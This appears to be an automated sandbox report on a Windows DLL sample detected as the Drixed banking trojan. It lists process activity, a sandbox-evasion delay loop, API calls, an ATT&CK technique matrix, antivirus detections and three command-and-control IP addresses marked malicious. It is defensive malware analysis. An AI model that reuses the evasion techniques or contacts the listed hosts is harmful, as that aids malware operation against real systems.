Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000004.00000003.392406274.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.601063055.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.392406274.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000003.601063055.000000004B280000.00000004.00000001.sdmp

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E9EF6CC push esi; mov dword ptr [esp], 00000000h

4_2_6E9EF6CD

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Section loaded: OutputDebugStringW count: 453

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E9F0754 GetTokenInformation,GetSystemInfo,GetTokenInformation,

4_2_6E9F0754

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E9E6D50 GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_6E9E6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E9F3110 RtlAddVectoredExceptionHandler,

4_2_6E9F3110

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6256 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6488 -s 652	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6552 -s 652	Jump to behavior

Source: loaddll32.exe, 00000000.00000000.685939700.0000000000F70000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.412149757.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.690876638.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.692012759.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.618490575.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.648527408.00000000035D0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.644474497.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.650696024.0000000003000000.00000002.00020000.sdmp, WerFault.exe, 0000001C.00000002.690398813.0000000003410000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000000.685939700.0000000000F70000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.412149757.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.690876638.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.692012759.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.618490575.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.648527408.00000000035D0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.644474497.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.650696024.0000000003000000.00000002.00020000.sdmp, WerFault.exe, 0000001C.00000002.690398813.0000000003410000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000000.685939700.0000000000F70000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.412149757.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.690876638.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.692012759.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.618490575.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.648527408.00000000035D0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.644474497.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.650696024.0000000003000000.00000002.00020000.sdmp, WerFault.exe, 0000001C.00000002.690398813.0000000003410000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000000.685939700.0000000000F70000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.412149757.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.690876638.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.692012759.0000000003000000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.618490575.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.648527408.00000000035D0000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.644474497.0000000003780000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000000.650696024.0000000003000000.00000002.00020000.sdmp, WerFault.exe, 0000001C.00000002.690398813.0000000003410000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

4_2_6E9E6D50

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

4_2_6E9E6D50

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Disable or Modify Tools1	Input Capture1	Security Software Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion11	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion11	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information1	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	22%	Virustotal		Browse
SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	27%	ReversingLabs	Win32.Trojan.Drixed
SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.0.rundll32.exe.3220000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
14.0.rundll32.exe.3a0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
9.2.rundll32.exe.3370000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
12.0.rundll32.exe.3220000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.0.rundll32.exe.9c4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.0.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
9.0.rundll32.exe.3370000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
8.2.rundll32.exe.6b0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
9.0.rundll32.exe.6e9e0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
10.0.rundll32.exe.30d4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
12.2.rundll32.exe.4c64756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.0.rundll32.exe.4f34756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.rundll32.exe.690000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
3.0.rundll32.exe.690000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
14.0.rundll32.exe.3a0000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
10.0.rundll32.exe.30d4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.0.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
4.2.rundll32.exe.920000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
14.0.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.2.rundll32.exe.3220000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
8.2.rundll32.exe.dd4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.rundll32.exe.9c4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.2.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.2.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.0.loaddll32.exe.2554756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
4.2.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.0.rundll32.exe.4c64756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
10.2.rundll32.exe.30d4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.2.rundll32.exe.8e4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
14.2.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
14.0.rundll32.exe.8e4756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
3.0.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
10.2.rundll32.exe.b90000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
10.0.rundll32.exe.b90000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
4.2.rundll32.exe.b54756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.0.loaddll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
10.0.rundll32.exe.b90000.3.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
10.0.rundll32.exe.6e9e0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
8.2.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
14.2.rundll32.exe.3a0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
9.0.rundll32.exe.4f34756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.2.rundll32.exe.4f34756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.0.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
14.0.rundll32.exe.6e9e0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
14.0.rundll32.exe.8e4756.4.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
9.0.rundll32.exe.3370000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
0.0.loaddll32.exe.3d0000.0.unpack	100%	Avira	TR/ATRAPS.Gen2	Download File
9.2.rundll32.exe.6e9e0000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.0.rundll32.exe.6e9e0000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
12.0.rundll32.exe.4c64756.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.vomfass.deDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.vomfass.deDVarFileInfo$	loaddll32.exe, 00000000.00000000.686735544.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.412402180.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.693068558.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.634648052.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.621361116.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000002.687762853.000000006E9FF000.00000002.00020000.sdmp, rundll32.exe, 0000000E.00000002.683488441.000000006E9FF000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
66.147.235.11	unknown	United States	23535	HOSTROCKETUS	true
149.202.179.100	unknown	France	16276	OVHFR	true
81.0.236.89	unknown	Czech Republic	15685	CASABLANCA-ASInternetCollocationProviderCZ	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510694
Start date:	28.10.2021
Start time:	05:14:26
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Drixed-FJX345EADC8B1F5.514.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.evad.winDLL@33/17@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 99.5% (good quality ratio 91.8%) Quality average: 77% Quality standard deviation: 30.6%
HCA Information:	Successful, ratio: 67% Number of executed functions: 26 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .dll
